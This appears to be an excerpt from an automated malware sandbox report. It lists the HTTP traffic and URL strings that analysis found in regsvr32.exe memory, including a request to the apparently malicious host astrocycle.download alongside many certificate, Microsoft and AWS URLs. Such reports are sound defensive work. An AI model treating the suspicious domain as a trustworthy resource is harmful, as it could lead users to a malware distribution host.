        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 13:47:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=b8pfzzG0XJfzJuLuRBVzeOBEzZBFTUfWMFSlXvV4PJ6eZZ19VeeTkXwewjjyhC5yaPM359juJ4pqSeMTaolsHllOd1Jad91sl%2BrLgInH47n5AZnY27168xhsWtgKAvAehw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a948dd6874c2f4-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
        Source: regsvr32.exe, 00000003.00000002.2087788426.0000000000297000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmpString found in binary or memory: http://astrocycle.download/
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmpString found in binary or memory: http://crl.YuWt
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
        Source: regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmpString found in binary or memory: http://crl.sca1b.amazontrus
        Source: regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
        Source: regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
        Source: regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
        Source: regsvr32.exe, 00000003.00000002.2089794401.00000000030A0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
        Source: regsvr32.exe, 00000003.00000002.2089794401.00000000030A0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
        Source: regsvr32.exe, 00000003.00000002.2090325870.0000000003287000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: regsvr32.exe, 00000003.00000002.2090325870.0000000003287000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpString found in binary or memory: http://o.ss2.us/0
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
        Source: regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.sca1b
        Source: regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
        Source: regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
        Source: regsvr32.exe, 00000003.00000002.2088972655.0000000002CB0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096757696.0000000002BD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2103222528.0000000002AF0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: regsvr32.exe, 00000003.00000002.2087898389.0000000001DC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095197716.0000000001C90000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
        Source: regsvr32.exe, 00000003.00000002.2090325870.0000000003287000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: regsvr32.exe, 00000003.00000002.2090325870.0000000003287000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: regsvr32.exe, 00000003.00000002.2088972655.0000000002CB0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096757696.0000000002BD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2103222528.0000000002AF0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: regsvr32.exe, 00000003.00000002.2089794401.00000000030A0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
        Source: regsvr32.exe, 00000003.00000002.2090325870.0000000003287000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: regsvr32.exe, 00000003.00000002.2089794401.00000000030A0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: regsvr32.exe, 00000003.00000002.2089794401.00000000030A0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
        Source: regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/psf/null
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmpString found in binary or memory: https://aws.amazon.com/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc2=h_lg
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
